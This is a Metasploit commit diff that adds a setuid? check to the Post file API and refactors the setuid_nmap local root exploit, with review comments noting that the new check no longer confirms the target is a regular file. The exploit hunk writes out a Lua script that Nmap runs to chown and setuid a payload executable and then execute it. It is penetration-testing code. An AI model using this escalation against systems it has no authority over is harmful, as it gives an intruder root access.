
Commit 309deb9

committed
Land rapid7#9446, Post API fix for setuid_nmap
2 parents dee1ef0 + 5684b9e commit 309deb9


2 files changed

+38
-19
lines changed


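--- a/lib/msf/core/post/file.rb
+++ b/lib/msf/core/post/file.rb
@@ -59,7 +59,7 @@ def dir(directory)
 #
 # @param path [String] Remote filename to check
 def directory?(path)
-if session.type == "meterpreter"
+if session.type == 'meterpreter'
 stat = session.fs.file.stat(path) rescue nil
 return false unless stat
 return stat.directory?
@@ -70,9 +70,9 @@ def directory?(path)
 f = session.shell_command_token("test -d \"#{path}\" && echo true")
 end
 
-return false if f.nil? or f.empty?
+return false if f.nil? || f.empty?
 return false unless f =~ /true/
-return true
+true
 end
 end
 
@@ -93,7 +93,7 @@ def expand_path(path)
 #
 # @param path [String] Remote filename to check
 def file?(path)
-if session.type == "meterpreter"
+if session.type == 'meterpreter'
 stat = session.fs.file.stat(path) rescue nil
 return false unless stat
 return stat.file?
@@ -107,20 +107,40 @@ def file?(path)
 f = session.shell_command_token("test -f \"#{path}\" && echo true")
 end
 
-return false if f.nil? or f.empty?
+return false if f.nil? || f.empty?
 return false unless f =~ /true/
-return true
+true
 end
 end
 
 alias file_exist? file?
 
+#
+# See if +path+ on the remote system is a setuid file
+#
+# @param path [String] Remote filename to check
+def setuid?(path)
+if session.type == 'meterpreter'
+stat = session.fs.file.stat(path) rescue nil
+return false unless stat
+return stat.setuid?
+else
+if session.platform != 'windows'
+f = session.shell_command_token("test -u \"#{path}\" && echo true")
+end
+
+return false if f.nil? || f.empty?
+return false unless f =~ /true/
+true
+end
+end
+
 #
 # Check for existence of +path+ on the remote file system
 #
 # @param path [String] Remote filename to check
 def exist?(path)
-if session.type == "meterpreter"
+if session.type == 'meterpreter'
 stat = session.fs.file.stat(path) rescue nil
 return !!(stat)
 else
@@ -130,9 +150,9 @@ def exist?(path)
 f = cmd_exec("test -e \"#{path}\" && echo true")
 end
 
-return false if f.nil? or f.empty?
+return false if f.nil? || f.empty?
 return false unless f =~ /true/
-return true
+true
 end
 end
 
@@ -290,7 +310,7 @@ def write_file(file_name, data)
 end
 
 end
-return true
+true
 end
 
 #
@@ -314,7 +334,7 @@ def append_file(file_name, data)
 _write_file_unix_shell(file_name, data, true)
 end
 end
-return true
+true
 end
 
 #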
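Review bot: The new `setuid?` in the `@@ -107,20 +107,40 @@` hunk answers only "is the setuid bit set", not "is this a setuid *file*" as its header comment says: the meterpreter branch returns `stat.setuid?` with no `stat.file?` check, and the shell branch's `test -u` likewise succeeds for any setuid inode. Callers that need both conditions (the commit's own `check` in setuid_nmap previously required `stat.file?`) must combine it with `file?`, so the doc should state that contract, e.g. `# @return [Boolean] true if the setuid bit is set on +path+; does not verify +path+ is a regular file` and reword the header to `# See if +path+ on the remote system has the setuid bit set`. The `stat(path) rescue nil` modifier and the unescaped interpolation of +path+ into `test -u "#{path}"` follow the sibling methods' pattern, so they are a consistency choice here rather than a new issue, but a note that +path+ is expected to be trusted would help the next caller.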

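--- a/modules/exploits/unix/local/setuid_nmap.rb
+++ b/modules/exploits/unix/local/setuid_nmap.rb
@@ -51,12 +51,11 @@ def initialize(info={})
 end
 
 def check
-stat = session.fs.file.stat(datastore["Nmap"])
-if stat and stat.file? and stat.setuid?
-vprint_good("#{stat.prettymode} #{datastore["Nmap"]}")
+if setuid?(datastore['Nmap'])
+vprint_good("#{datastore['Nmap']} is setuid")
 return CheckCode::Vulnerable
 end
-return CheckCode::Safe
+CheckCode::Safe
 end
 
 def exploit
@@ -69,16 +68,16 @@ def exploit
 write_file(exe_file, generate_payload_exe)
 evil_lua = %Q{
 os.execute("chown root:root #{exe_file}");
-os.execute("chmod 6777 #{exe_file}");
+os.execute("chmod 6700 #{exe_file}");
 os.execute("#{exe_file} &");
-os.execute("rm #{exe_file}");
+os.execute("rm -f #{exe_file}");
 }
 end
 lua_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}.nse"
 print_status("Dropping lua #{lua_file}")
 write_file(lua_file, evil_lua)
 
-print_status("running")
+print_status("Running #{lua_file} with Nmap")
 
 scriptname = lua_file
 if (lua_file[0,1] == "/")
@@ -91,7 +90,7 @@ def exploit
 # Versions before 4.75 (August 2008) will not run scripts without a port scan
 cmd_exec "#{datastore["Nmap"]} --script #{scriptname} -p80 localhost #{datastore["ExtraArgs"]}"
 ensure
-cmd_exec "rm -f #{lua_file} #{exe_file}"
+rm_f(lua_file, exe_file)
 end
 
 end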
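Review bot: The rewritten `check` in the `@@ -51,12 +51,11 @@` hunk drops the `stat.file?` condition the old code required, so a path whose setuid bit is set but which is not a regular file (a directory, or a path that resolves to something other than the binary) would now be reported as `CheckCode::Vulnerable` where it was previously `Safe`. The Post API's `setuid?` only tests the bit, so the regular-file test has to stay in the caller: `if file?(datastore['Nmap']) && setuid?(datastore['Nmap'])`. Also note that the new message no longer records `stat.prettymode`; if the mode string was useful for verification, that detail is lost with the move to the helper. The other hunks in this section are inside `exploit`, whose start and end lie outside the hunks.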
